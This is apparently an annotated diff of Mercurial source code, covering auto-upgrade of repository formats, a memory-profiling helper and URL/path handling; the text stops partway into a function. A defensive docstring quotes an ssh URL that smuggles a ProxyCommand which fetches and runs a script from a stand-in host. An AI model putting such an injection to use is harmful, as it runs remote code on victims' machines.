134 137 hint = b"(see `hg help config.format.use-dirstate-tracked-hint` for details)\n"
135 138
136 139 def action():
137 140 if not (ui.quiet or auto_upgrade_quiet):
138 141 ui.write_err(msg)
139 142 ui.write_err(hint)
140 143 requirements.discard(requirementsmod.DIRSTATE_TRACKED_HINT_V1)
141 144 op = AutoUpgradeOperation(requirements)
142 145 engine.upgrade_tracked_hint(ui, repo, op, add=False)
143 146
144 147 return action
145 148
146 149
147 150 def get_dirstate_v2_action(repo):
148 151 """return an automatic-upgrade action for `dirstate-v2` if applicable
149 152
150 153 If no action is needed, return None, otherwise return a callback to upgrade
151 154 or downgrade the repository according to the configuration and repository
152 155 format.
153 156 """
154 157 ui = repo.ui
155 158 requirements = set(repo.requirements)
156 159 auto_upgrade_dv2 = ui.configbool(
157 160 b'format',
158 161 b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories',
159 162 )
160 163 auto_upgrade_dv2_quiet = ui.configbool(
161 164 b'format',
162 165 b'use-dirstate-v2.automatic-upgrade-of-mismatching-repositories:quiet',
163 166 )
164 167
165 168 action = None
166 169
167 170 if auto_upgrade_dv2:
168 171 d2_config = ui.configbool(b'format', b'use-dirstate-v2')
169 172 d2_local = requirementsmod.DIRSTATE_V2_REQUIREMENT in requirements
170 173 if d2_config and not d2_local:
171 174 msg = _(
172 175 b"automatically upgrading repository to the `dirstate-v2`"
173 176 b" feature\n"
174 177 )
175 178 hint = (
176 179 b"(see `hg help config.format.use-dirstate-v2` for details)\n"
177 180 )
178 181
179 182 def action():
180 183 if not (ui.quiet or auto_upgrade_dv2_quiet):
181 184 ui.write_err(msg)
182 185 ui.write_err(hint)
183 186 requirements.add(requirementsmod.DIRSTATE_V2_REQUIREMENT)
184 187 fake_op = AutoUpgradeOperation(requirements)
185 188 engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v1', b'v2')
186 189
187 190 elif d2_local and not d2_config:
188 191 msg = _(
189 192 b"automatically downgrading repository from the `dirstate-v2`"
190 193 b" feature\n"
191 194 )
192 195 hint = (
193 196 b"(see `hg help config.format.use-dirstate-v2` for details)\n"
194 197 )
195 198
196 199 def action():
197 200 if not (ui.quiet or auto_upgrade_dv2_quiet):
198 201 ui.write_err(msg)
199 202 ui.write_err(hint)
200 203 requirements.discard(requirementsmod.DIRSTATE_V2_REQUIREMENT)
201 204 fake_op = AutoUpgradeOperation(requirements)
202 205 engine.upgrade_dirstate(repo.ui, repo, fake_op, b'v2', b'v1')
203 206
204 207 return action
205 208
206 209
207 210 AUTO_UPGRADE_ACTIONS = [
208 211 get_dirstate_v2_action,
209 212 get_share_safe_action,
210 213 get_tracked_hint_action,
211 214 ]
212 215
213 216
214 217 def may_auto_upgrade(repo, maker_func):
215 218 """potentially perform auto-upgrade and return the final repository to use
216 219
217 220 Auto-upgrades are "quick" repository upgrades that might automatically be run
218 221 by "any" repository access. See `hg help config.format` for automatic
219 222 upgrade documentation.
220 223
221 224 note: each relevant upgrade is done one after the other for simplicity.
222 225 This avoids leaving the repository in a partially inconsistent state while
223 226 upgrading.
224 227
225 228 repo: the current repository instance
226 229 maker_func: a factory function that can recreate a repository after an upgrade
227 230 """
228 231 clear = False
229 232
230 233 loop = 0
231 234
232 235 try:
233 236 while not clear:
234 237 loop += 1
235 238 if loop > 100:
236 239 # XXX basic protection against infinite loop, make it better.
237 240 raise error.ProgrammingError("Too many auto upgrade loops")
238 241 clear = True
239 242 for get_action in AUTO_UPGRADE_ACTIONS:
240 243 action = get_action(repo)
241 244 if action is not None:
242 245 clear = False
243 246 with repo.wlock(wait=False), repo.lock(wait=False):
244 247 action = get_action(repo)
245 248 if action is not None:
246 249 action()
247 250 repo = maker_func()
248 251 except error.LockError:
249 252 # if we cannot get the lock, ignore the auto-upgrade attempts and
250 253 # proceed. We might want to make this behavior configurable in the
251 254 # future.
252 255 pass
253 256
254 257 return repo
@@ -1,44 +1,46
1 1 # memorytop requires Python 3.4
2 2 #
3 3 # Usage: set PYTHONTRACEMALLOC=n in the environment of the hg invocation,
4 4 # where n >= 1 is the number of frames to show in the backtrace. Put calls to
5 5 # memorytop in strategic places to show the current memory use by allocation
6 6 # site.
7 7
8 from __future__ import annotations
9
8 10 import gc
9 11 import tracemalloc
10 12
11 13
12 14 def memorytop(limit=10):
13 15 gc.collect()
14 16 snapshot = tracemalloc.take_snapshot()
15 17
16 18 snapshot = snapshot.filter_traces(
17 19 (
18 20 tracemalloc.Filter(False, "<frozen importlib._bootstrap>"),
19 21 tracemalloc.Filter(False, "<frozen importlib._bootstrap_external>"),
20 22 tracemalloc.Filter(False, "<unknown>"),
21 23 )
22 24 )
23 25 stats = snapshot.statistics('traceback')
24 26
25 27 total = sum(stat.size for stat in stats)
26 28 print("\nTotal allocated size: %.1f KiB\n" % (total / 1024))
27 29 print("Lines with the biggest net allocations")
28 30 for index, stat in enumerate(stats[:limit], 1):
29 31 print(
30 32 "#%d: %d objects using %.1f KiB"
31 33 % (index, stat.count, stat.size / 1024)
32 34 )
33 35 for line in stat.traceback.format(most_recent_first=True):
34 36 print(' ', line)
35 37
36 38 other = stats[limit:]
37 39 if other:
38 40 size = sum(stat.size for stat in other)
39 41 count = sum(stat.count for stat in other)
40 42 print(
41 43 "%s other: %d objects using %.1f KiB"
42 44 % (len(other), count, size / 1024)
43 45 )
44 46 print()
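# Illustrative usage (assuming this module is importable as
# mercurial.utils.memorytop; the command and call site are only examples):
#
#   $ PYTHONTRACEMALLOC=25 hg status
#
# and, somewhere in the code path being investigated:
#
#   from mercurial.utils.memorytop import memorytop
#   memorytop(limit=20)  # report the 20 largest allocation sites seen so far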
@@ -1,971 +1,974
1 1 # utils.urlutil - code related to [paths] management
2 2 #
3 3 # Copyright 2005-2023 Olivia Mackall <olivia@selenic.com> and others
4 4 #
5 5 # This software may be used and distributed according to the terms of the
6 6 # GNU General Public License version 2 or any later version.
7
8 from __future__ import annotations
9
7 10 import os
8 11 import re as remod
9 12 import socket
10 13
11 14 from typing import (
12 15 Callable,
13 16 Dict,
14 17 Tuple,
15 18 Union,
16 19 )
17 20
18 21 from ..i18n import _
19 22 from .. import (
20 23 encoding,
21 24 error,
22 25 pycompat,
23 26 urllibcompat,
24 27 )
25 28
26 29 from . import (
27 30 stringutil,
28 31 )
29 32
30 33 from ..revlogutils import (
31 34 constants as revlog_constants,
32 35 )
33 36
34 37 # keeps pyflakes happy
35 38 assert [Callable, Dict, Tuple, Union]
36 39
37 40 urlreq = urllibcompat.urlreq
38 41
39 42
40 43 def getport(port: Union[bytes, int]) -> int:
41 44 """Return the port for a given network service.
42 45
43 46 If port is an integer, it's returned as is. If it's a string, it's
44 47 looked up using socket.getservbyname(). If there's no matching
45 48 service, error.Abort is raised.
46 49 """
47 50 try:
48 51 return int(port)
49 52 except ValueError:
50 53 pass
51 54
52 55 try:
53 56 return socket.getservbyname(pycompat.sysstr(port))
54 57 except socket.error:
55 58 raise error.Abort(
56 59 _(b"no port number associated with service '%s'") % port
57 60 )
58 61
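# For example (illustrative; the lookup result depends on the system's
# services database): getport(443) and getport(b'443') both return 443, while
# getport(b'https') goes through socket.getservbyname() and typically also
# resolves to 443. An unknown service name raises error.Abort.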
59 62
60 63 class url:
61 64 r"""Reliable URL parser.
62 65
63 66 This parses URLs and provides attributes for the following
64 67 components:
65 68
66 69 <scheme>://<user>:<passwd>@<host>:<port>/<path>?<query>#<fragment>
67 70
68 71 Missing components are set to None. The only exception is
69 72 fragment, which is set to '' if present but empty.
70 73
71 74 If parsefragment is False, fragment is included in query. If
72 75 parsequery is False, query is included in path. If both are
73 76 False, both fragment and query are included in path.
74 77
75 78 See http://www.ietf.org/rfc/rfc2396.txt for more information.
76 79
77 80 Note that for backward compatibility reasons, bundle URLs do not
78 81 take host names. That means 'bundle://../' has a path of '../'.
79 82
80 83 Examples:
81 84
82 85 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
83 86 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
84 87 >>> url(b'ssh://[::1]:2200//home/joe/repo')
85 88 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
86 89 >>> url(b'file:///home/joe/repo')
87 90 <url scheme: 'file', path: '/home/joe/repo'>
88 91 >>> url(b'file:///c:/temp/foo/')
89 92 <url scheme: 'file', path: 'c:/temp/foo/'>
90 93 >>> url(b'bundle:foo')
91 94 <url scheme: 'bundle', path: 'foo'>
92 95 >>> url(b'bundle://../foo')
93 96 <url scheme: 'bundle', path: '../foo'>
94 97 >>> url(br'c:\foo\bar')
95 98 <url path: 'c:\\foo\\bar'>
96 99 >>> url(br'\\blah\blah\blah')
97 100 <url path: '\\\\blah\\blah\\blah'>
98 101 >>> url(br'\\blah\blah\blah#baz')
99 102 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
100 103 >>> url(br'file:///C:\users\me')
101 104 <url scheme: 'file', path: 'C:\\users\\me'>
102 105
103 106 Authentication credentials:
104 107
105 108 >>> url(b'ssh://joe:xyz@x/repo')
106 109 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
107 110 >>> url(b'ssh://joe@x/repo')
108 111 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
109 112
110 113 Query strings and fragments:
111 114
112 115 >>> url(b'http://host/a?b#c')
113 116 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
114 117 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
115 118 <url scheme: 'http', host: 'host', path: 'a?b#c'>
116 119
117 120 Empty path:
118 121
119 122 >>> url(b'')
120 123 <url path: ''>
121 124 >>> url(b'#a')
122 125 <url path: '', fragment: 'a'>
123 126 >>> url(b'http://host/')
124 127 <url scheme: 'http', host: 'host', path: ''>
125 128 >>> url(b'http://host/#a')
126 129 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
127 130
128 131 Only scheme:
129 132
130 133 >>> url(b'http:')
131 134 <url scheme: 'http'>
132 135 """
133 136
134 137 _safechars = b"!~*'()+"
135 138 _safepchars = b"/!~*'()+:\\"
136 139 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
137 140
138 141 def __init__(
139 142 self,
140 143 path: bytes,
141 144 parsequery: bool = True,
142 145 parsefragment: bool = True,
143 146 ) -> None:
144 147 # We slowly chomp away at path until we have only the path left
145 148 self.scheme = self.user = self.passwd = self.host = None
146 149 self.port = self.path = self.query = self.fragment = None
147 150 self._localpath = True
148 151 self._hostport = b''
149 152 self._origpath = path
150 153
151 154 if parsefragment and b'#' in path:
152 155 path, self.fragment = path.split(b'#', 1)
153 156
154 157 # special case for Windows drive letters and UNC paths
155 158 if hasdriveletter(path) or path.startswith(b'\\\\'):
156 159 self.path = path
157 160 return
158 161
159 162 # For compatibility reasons, we can't handle bundle paths as
160 163 # normal URLs
161 164 if path.startswith(b'bundle:'):
162 165 self.scheme = b'bundle'
163 166 path = path[7:]
164 167 if path.startswith(b'//'):
165 168 path = path[2:]
166 169 self.path = path
167 170 return
168 171
169 172 if self._matchscheme(path):
170 173 parts = path.split(b':', 1)
171 174 if parts[0]:
172 175 self.scheme, path = parts
173 176 self._localpath = False
174 177
175 178 if not path:
176 179 path = None
177 180 if self._localpath:
178 181 self.path = b''
179 182 return
180 183 else:
181 184 if self._localpath:
182 185 self.path = path
183 186 return
184 187
185 188 if parsequery and b'?' in path:
186 189 path, self.query = path.split(b'?', 1)
187 190 if not path:
188 191 path = None
189 192 if not self.query:
190 193 self.query = None
191 194
192 195 # // is required to specify a host/authority
193 196 if path and path.startswith(b'//'):
194 197 parts = path[2:].split(b'/', 1)
195 198 if len(parts) > 1:
196 199 self.host, path = parts
197 200 else:
198 201 self.host = parts[0]
199 202 path = None
200 203 if not self.host:
201 204 self.host = None
202 205 # path of file:///d is /d
203 206 # path of file:///d:/ is d:/, not /d:/
204 207 if path and not hasdriveletter(path):
205 208 path = b'/' + path
206 209
207 210 if self.host and b'@' in self.host:
208 211 self.user, self.host = self.host.rsplit(b'@', 1)
209 212 if b':' in self.user:
210 213 self.user, self.passwd = self.user.split(b':', 1)
211 214 if not self.host:
212 215 self.host = None
213 216
214 217 # Don't split on colons in IPv6 addresses without ports
215 218 if (
216 219 self.host
217 220 and b':' in self.host
218 221 and not (
219 222 self.host.startswith(b'[') and self.host.endswith(b']')
220 223 )
221 224 ):
222 225 self._hostport = self.host
223 226 self.host, self.port = self.host.rsplit(b':', 1)
224 227 if not self.host:
225 228 self.host = None
226 229
227 230 if (
228 231 self.host
229 232 and self.scheme == b'file'
230 233 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
231 234 ):
232 235 raise error.Abort(
233 236 _(b'file:// URLs can only refer to localhost')
234 237 )
235 238
236 239 self.path = path
237 240
238 241 # leave the query string escaped
239 242 for a in ('user', 'passwd', 'host', 'port', 'path', 'fragment'):
240 243 v = getattr(self, a)
241 244 if v is not None:
242 245 setattr(self, a, urlreq.unquote(v))
243 246
244 247 def copy(self):
245 248 u = url(b'temporary useless value')
246 249 u.path = self.path
247 250 u.scheme = self.scheme
248 251 u.user = self.user
249 252 u.passwd = self.passwd
250 253 u.host = self.host
251 254 u.port = self.port
252 255 u.query = self.query
253 256 u.fragment = self.fragment
254 257 u._localpath = self._localpath
255 258 u._hostport = self._hostport
256 259 u._origpath = self._origpath
257 260 return u
258 261
259 262 @encoding.strmethod
260 263 def __repr__(self):
261 264 attrs = []
262 265 for a in (
263 266 'scheme',
264 267 'user',
265 268 'passwd',
266 269 'host',
267 270 'port',
268 271 'path',
269 272 'query',
270 273 'fragment',
271 274 ):
272 275 v = getattr(self, a)
273 276 if v is not None:
274 277 line = b'%s: %r'
275 278 line %= (pycompat.bytestr(a), pycompat.bytestr(v))
276 279 attrs.append(line)
277 280 return b'<url %s>' % b', '.join(attrs)
278 281
279 282 def __bytes__(self):
280 283 r"""Join the URL's components back into a URL string.
281 284
282 285 Examples:
283 286
284 287 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
285 288 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
286 289 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
287 290 'http://user:pw@host:80/?foo=bar&baz=42'
288 291 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
289 292 'http://user:pw@host:80/?foo=bar%3dbaz'
290 293 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
291 294 'ssh://user:pw@[::1]:2200//home/joe#'
292 295 >>> bytes(url(b'http://localhost:80//'))
293 296 'http://localhost:80//'
294 297 >>> bytes(url(b'http://localhost:80/'))
295 298 'http://localhost:80/'
296 299 >>> bytes(url(b'http://localhost:80'))
297 300 'http://localhost:80/'
298 301 >>> bytes(url(b'bundle:foo'))
299 302 'bundle:foo'
300 303 >>> bytes(url(b'bundle://../foo'))
301 304 'bundle:../foo'
302 305 >>> bytes(url(b'path'))
303 306 'path'
304 307 >>> bytes(url(b'file:///tmp/foo/bar'))
305 308 'file:///tmp/foo/bar'
306 309 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
307 310 'file:///c:/tmp/foo/bar'
308 311 >>> print(url(br'bundle:foo\bar'))
309 312 bundle:foo\bar
310 313 >>> print(url(br'file:///D:\data\hg'))
311 314 file:///D:\data\hg
312 315 """
313 316 if self._localpath:
314 317 s = self.path
315 318 if self.scheme == b'bundle':
316 319 s = b'bundle:' + s
317 320 if self.fragment:
318 321 s += b'#' + self.fragment
319 322 return s
320 323
321 324 s = self.scheme + b':'
322 325 if self.user or self.passwd or self.host:
323 326 s += b'//'
324 327 elif self.scheme and (
325 328 not self.path
326 329 or self.path.startswith(b'/')
327 330 or hasdriveletter(self.path)
328 331 ):
329 332 s += b'//'
330 333 if hasdriveletter(self.path):
331 334 s += b'/'
332 335 if self.user:
333 336 s += urlreq.quote(self.user, safe=self._safechars)
334 337 if self.passwd:
335 338 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
336 339 if self.user or self.passwd:
337 340 s += b'@'
338 341 if self.host:
339 342 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
340 343 s += urlreq.quote(self.host)
341 344 else:
342 345 s += self.host
343 346 if self.port:
344 347 s += b':' + urlreq.quote(self.port)
345 348 if self.host:
346 349 s += b'/'
347 350 if self.path:
348 351 # TODO: similar to the query string, we should not unescape the
349 352 # path when we store it, the path might contain '%2f' = '/',
350 353 # which we should *not* escape.
351 354 s += urlreq.quote(self.path, safe=self._safepchars)
352 355 if self.query:
353 356 # we store the query in escaped form.
354 357 s += b'?' + self.query
355 358 if self.fragment is not None:
356 359 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
357 360 return s
358 361
359 362 __str__ = encoding.strmethod(__bytes__)
360 363
361 364 def authinfo(self):
362 365 user, passwd = self.user, self.passwd
363 366 try:
364 367 self.user, self.passwd = None, None
365 368 s = bytes(self)
366 369 finally:
367 370 self.user, self.passwd = user, passwd
368 371 if not self.user:
369 372 return (s, None)
370 373 # authinfo[1] is passed to urllib2 password manager, and its
371 374 # URIs must not contain credentials. The host is passed in the
372 375 # URIs list because Python < 2.4.3 uses only that to search for
373 376 # a password.
374 377 return (s, (None, (s, self.host), self.user, self.passwd or b''))
375 378
376 379 def isabs(self):
377 380 if self.scheme and self.scheme != b'file':
378 381 return True # remote URL
379 382 if hasdriveletter(self.path):
380 383 return True # absolute for our purposes - can't be joined()
381 384 if self.path.startswith(br'\\'):
382 385 return True # Windows UNC path
383 386 if self.path.startswith(b'/'):
384 387 return True # POSIX-style
385 388 return False
386 389
387 390 def localpath(self) -> bytes:
388 391 if self.scheme == b'file' or self.scheme == b'bundle':
389 392 path = self.path or b'/'
390 393 # For Windows, we need to promote hosts containing drive
391 394 # letters to paths with drive letters.
392 395 if hasdriveletter(self._hostport):
393 396 path = self._hostport + b'/' + self.path
394 397 elif (
395 398 self.host is not None and self.path and not hasdriveletter(path)
396 399 ):
397 400 path = b'/' + path
398 401 return path
399 402 return self._origpath
400 403
401 404 def islocal(self):
402 405 '''whether localpath will return something that posixfile can open'''
403 406 return (
404 407 not self.scheme
405 408 or self.scheme == b'file'
406 409 or self.scheme == b'bundle'
407 410 )
408 411
409 412
410 413 def hasscheme(path: bytes) -> bool:
411 414 return bool(url(path).scheme) # cast to help pytype
412 415
413 416
414 417 def hasdriveletter(path: bytes) -> bool:
415 418 return bool(path) and path[1:2] == b':' and path[0:1].isalpha()
416 419
417 420
418 421 def urllocalpath(path: bytes) -> bytes:
419 422 return url(path, parsequery=False, parsefragment=False).localpath()
420 423
421 424
422 425 def checksafessh(path: bytes) -> None:
423 426 """check if a path / url is a potentially unsafe ssh exploit (SEC)
424 427
425 428 This is a sanity check for ssh urls. ssh will parse the first item as
426 429 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
427 430 Let's prevent these potentially exploited urls entirely and warn the
428 431 user.
429 432
430 433 Raises an error.Abort when the url is unsafe.
431 434 """
432 435 path = urlreq.unquote(path)
433 436 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
434 437 raise error.Abort(
435 438 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
436 439 )
437 440
438 441
439 442 def hidepassword(u: bytes) -> bytes:
440 443 '''hide user credential in a url string'''
441 444 u = url(u)
442 445 if u.passwd:
443 446 u.passwd = b'***'
444 447 return bytes(u)
445 448
446 449
447 450 def removeauth(u: bytes) -> bytes:
448 451 '''remove all authentication information from a url string'''
449 452 u = url(u)
450 453 u.user = u.passwd = None
451 454 return bytes(u)
452 455
453 456
454 457 def list_paths(ui, target_path=None):
455 458 """list all the (name, paths) in the passed ui"""
456 459 result = []
457 460 if target_path is None:
458 461 for name, paths in sorted(ui.paths.items()):
459 462 for p in paths:
460 463 result.append((name, p))
461 464
462 465 else:
463 466 for path in ui.paths.get(target_path, []):
464 467 result.append((target_path, path))
465 468 return result
466 469
467 470
468 471 def try_path(ui, url):
469 472 """try to build a path from a url
470 473
471 474 Return None if no Path could be built.
472 475 """
473 476 try:
474 477 # we pass the ui instance as warnings might need to be issued
475 478 return path(ui, None, rawloc=url)
476 479 except ValueError:
477 480 return None
478 481
479 482
480 483 def get_push_paths(repo, ui, dests):
481 484 """yields all the `path` selected as push destination by `dests`"""
482 485 if not dests:
483 486 if b'default-push' in ui.paths:
484 487 for p in ui.paths[b'default-push']:
485 488 yield p.get_push_variant()
486 489 elif b'default' in ui.paths:
487 490 for p in ui.paths[b'default']:
488 491 yield p.get_push_variant()
489 492 else:
490 493 raise error.ConfigError(
491 494 _(b'default repository not configured!'),
492 495 hint=_(b"see 'hg help config.paths'"),
493 496 )
494 497 else:
495 498 for dest in dests:
496 499 if dest in ui.paths:
497 500 for p in ui.paths[dest]:
498 501 yield p.get_push_variant()
499 502 else:
500 503 path = try_path(ui, dest)
501 504 if path is None:
502 505 msg = _(b'repository %s does not exist')
503 506 msg %= dest
504 507 raise error.RepoError(msg)
505 508 yield path.get_push_variant()
506 509
507 510
508 511 def get_pull_paths(repo, ui, sources):
509 512 """yields all the `(path, branch)` selected as pull source by `sources`"""
510 513 if not sources:
511 514 sources = [b'default']
512 515 for source in sources:
513 516 if source in ui.paths:
514 517 for p in ui.paths[source]:
515 518 yield p
516 519 else:
517 520 p = path(ui, None, source, validate_path=False)
518 521 yield p
519 522
520 523
521 524 def get_unique_push_path(action, repo, ui, dest=None):
522 525 """return a unique `path` or abort if multiple are found
523 526
524 527 This is useful for commands and actions that do not support multiple
525 528 destinations (yet).
526 529
527 530 The `action` parameter will be used for the error message.
528 531 """
529 532 if dest is None:
530 533 dests = []
531 534 else:
532 535 dests = [dest]
533 536 dests = list(get_push_paths(repo, ui, dests))
534 537 if len(dests) != 1:
535 538 if dest is None:
536 539 msg = _(
537 540 b"default path points to %d urls while %s only supports one"
538 541 )
539 542 msg %= (len(dests), action)
540 543 else:
541 544 msg = _(b"path points to %d urls while %s only supports one: %s")
542 545 msg %= (len(dests), action, dest)
543 546 raise error.Abort(msg)
544 547 return dests[0]
545 548
546 549
547 550 def get_unique_pull_path_obj(action, ui, source=None):
548 551 """return a unique `(path, branch)` or abort if multiple are found
549 552
550 553 This is useful for commands and actions that do not support multiple
551 554 destinations (yet).
552 555
553 556 The `action` parameter will be used for the error message.
554 557
555 558 note: Ideally, this function would be called `get_unique_pull_path` to
556 559 mirror the `get_unique_push_path`, but the name was already taken.
557 560 """
558 561 sources = []
559 562 if source is not None:
560 563 sources.append(source)
561 564
562 565 pull_paths = list(get_pull_paths(None, ui, sources=sources))
563 566 path_count = len(pull_paths)
564 567 if path_count != 1:
565 568 if source is None:
566 569 msg = _(
567 570 b"default path points to %d urls while %s only supports one"
568 571 )
569 572 msg %= (path_count, action)
570 573 else:
571 574 msg = _(b"path points to %d urls while %s only supports one: %s")
572 575 msg %= (path_count, action, source)
573 576 raise error.Abort(msg)
574 577 return pull_paths[0]
575 578
576 579
577 580 def get_unique_pull_path(action, repo, ui, source=None, default_branches=()):
578 581 """return a unique `(url, branch)` or abort if multiple are found
579 582
580 583 See `get_unique_pull_path_obj` for details.
581 584 """
582 585 path = get_unique_pull_path_obj(action, ui, source=source)
583 586 return parseurl(path.rawloc, default_branches)
584 587
585 588
586 589 def get_clone_path_obj(ui, source):
587 590 """return the `(origsource, url, branch)` selected as clone source"""
588 591 if source == b'':
589 592 return None
590 593 return get_unique_pull_path_obj(b'clone', ui, source=source)
591 594
592 595
593 596 def get_clone_path(ui, source, default_branches=None):
594 597 """return the `(origsource, url, branch)` selected as clone source"""
595 598 path = get_clone_path_obj(ui, source)
596 599 if path is None:
597 600 return (b'', b'', (None, default_branches))
598 601 if default_branches is None:
599 602 default_branches = []
600 603 branches = (path.branch, default_branches)
601 604 return path.rawloc, path.loc, branches
602 605
603 606
604 607 def parseurl(path, branches=None):
605 608 '''parse url#branch, returning (url, (branch, branches))'''
606 609 u = url(path)
607 610 branch = None
608 611 if u.fragment:
609 612 branch = u.fragment
610 613 u.fragment = None
611 614 return bytes(u), (branch, branches or [])
612 615
613 616
614 617 class paths(dict):
615 618 """Represents a collection of paths and their configs.
616 619
617 620 Data is initially derived from ui instances and the config files they have
618 621 loaded.
619 622 """
620 623
621 624 def __init__(self, ui):
622 625 dict.__init__(self)
623 626
624 627 home_path = os.path.expanduser(b'~')
625 628
626 629 for name, value in ui.configitems(b'paths', ignoresub=True):
627 630 # No location is the same as not existing.
628 631 if not value:
629 632 continue
630 633 _value, sub_opts = ui.configsuboptions(b'paths', name)
631 634 s = ui.configsource(b'paths', name)
632 635 root_key = (name, value, s)
633 636 root = ui._path_to_root.get(root_key, home_path)
634 637
635 638 multi_url = sub_opts.get(b'multi-urls')
636 639 if multi_url is not None and stringutil.parsebool(multi_url):
637 640 base_locs = stringutil.parselist(value)
638 641 else:
639 642 base_locs = [value]
640 643
641 644 paths = []
642 645 for loc in base_locs:
643 646 loc = os.path.expandvars(loc)
644 647 loc = os.path.expanduser(loc)
645 648 if not hasscheme(loc) and not os.path.isabs(loc):
646 649 loc = os.path.normpath(os.path.join(root, loc))
647 650 p = path(ui, name, rawloc=loc, suboptions=sub_opts)
648 651 paths.append(p)
649 652 self[name] = paths
650 653
651 654 for name, old_paths in sorted(self.items()):
652 655 new_paths = []
653 656 for p in old_paths:
654 657 new_paths.extend(_chain_path(p, ui, self))
655 658 self[name] = new_paths
656 659
657 660
658 661 _pathsuboptions: "Dict[bytes, Tuple[str, Callable]]" = {}
659 662 # a dictionary of methods that can be used to format a sub-option value
660 663 path_suboptions_display = {}
661 664
662 665
663 666 def pathsuboption(option: bytes, attr: str, display=pycompat.bytestr):
664 667 """Decorator used to declare a path sub-option.
665 668
666 669 Arguments are the sub-option name and the attribute it should set on
667 670 ``path`` instances.
668 671
669 672 The decorated function will receive as arguments a ``ui`` instance,
670 673 ``path`` instance, and the string value of this option from the config.
671 674 The function should return the value that will be set on the ``path``
672 675 instance.
673 676
674 677 The optional `display` argument is a function that can be used to format
675 678 the value when displayed to the user (like in `hg paths` for example).
676 679
677 680 This decorator can be used to perform additional verification of
678 681 sub-options and to change the type of sub-options.
679 682 """
680 683 if isinstance(attr, bytes):
681 684 msg = b'pathsuboption takes `str` as "attr" argument, not `bytes`'
682 685 raise TypeError(msg)
683 686
684 687 def register(func):
685 688 _pathsuboptions[option] = (attr, func)
686 689 path_suboptions_display[option] = display
687 690 return func
688 691
689 692 return register
690 693
691 694
692 695 def display_bool(value):
693 696 """display a boolean suboption back to the user"""
694 697 return b'yes' if value else b'no'
695 698
696 699
697 700 @pathsuboption(b'pushurl', '_pushloc')
698 701 def pushurlpathoption(ui, path, value):
699 702 u = url(value)
700 703 # Actually require a URL.
701 704 if not u.scheme:
702 705 msg = _(b'(paths.%s:pushurl not a URL; ignoring: "%s")\n')
703 706 msg %= (path.name, value)
704 707 ui.warn(msg)
705 708 return None
706 709
707 710 # Don't support the #foo syntax in the push URL to declare branch to
708 711 # push.
709 712 if u.fragment:
710 713 ui.warn(
711 714 _(
712 715 b'("#fragment" in paths.%s:pushurl not supported; '
713 716 b'ignoring)\n'
714 717 )
715 718 % path.name
716 719 )
717 720 u.fragment = None
718 721
719 722 return bytes(u)
720 723
721 724
722 725 @pathsuboption(b'pushrev', 'pushrev')
723 726 def pushrevpathoption(ui, path, value):
724 727 return value
725 728
726 729
727 730 SUPPORTED_BOOKMARKS_MODES = {
728 731 b'default',
729 732 b'mirror',
730 733 b'ignore',
731 734 }
732 735
733 736
734 737 @pathsuboption(b'bookmarks.mode', 'bookmarks_mode')
735 738 def bookmarks_mode_option(ui, path, value):
736 739 if value not in SUPPORTED_BOOKMARKS_MODES:
737 740 path_name = path.name
738 741 if path_name is None:
739 742 # this is an "anonymous" path, config comes from the global one
740 743 path_name = b'*'
741 744 msg = _(b'(paths.%s:bookmarks.mode has unknown value: "%s")\n')
742 745 msg %= (path_name, value)
743 746 ui.warn(msg)
744 747 if value == b'default':
745 748 value = None
746 749 return value
747 750
748 751
749 752 DELTA_REUSE_POLICIES = {
750 753 b'default': None,
751 754 b'try-base': revlog_constants.DELTA_BASE_REUSE_TRY,
752 755 b'no-reuse': revlog_constants.DELTA_BASE_REUSE_NO,
753 756 b'forced': revlog_constants.DELTA_BASE_REUSE_FORCE,
754 757 }
755 758 DELTA_REUSE_POLICIES_NAME = dict(i[::-1] for i in DELTA_REUSE_POLICIES.items())
756 759
757 760
758 761 @pathsuboption(
759 762 b'pulled-delta-reuse-policy',
760 763 'delta_reuse_policy',
761 764 display=DELTA_REUSE_POLICIES_NAME.get,
762 765 )
763 766 def delta_reuse_policy(ui, path, value):
764 767 if value not in DELTA_REUSE_POLICIES:
765 768 path_name = path.name
766 769 if path_name is None:
767 770 # this is an "anonymous" path, config comes from the global one
768 771 path_name = b'*'
769 772 msg = _(
770 773 b'(paths.%s:pulled-delta-reuse-policy has unknown value: "%s")\n'
771 774 )
772 775 msg %= (path_name, value)
773 776 ui.warn(msg)
774 777 return DELTA_REUSE_POLICIES.get(value)
775 778
776 779
777 780 @pathsuboption(b'multi-urls', 'multi_urls', display=display_bool)
778 781 def multiurls_pathoption(ui, path, value):
779 782 res = stringutil.parsebool(value)
780 783 if res is None:
781 784 ui.warn(
782 785 _(b'(paths.%s:multi-urls not a boolean; ignoring)\n') % path.name
783 786 )
784 787 res = False
785 788 return res
786 789
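# Illustrative configuration accepted by the sub-option above (the URLs are
# placeholders): with `multi-urls` enabled, one path name expands to several
# locations, each turned into its own `path` instance by the `paths` class:
#
#   [paths]
#   default = https://mirror1.example.org/repo, https://mirror2.example.org/repo
#   default:multi-urls = yes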
787 790
788 791 def _chain_path(base_path, ui, paths):
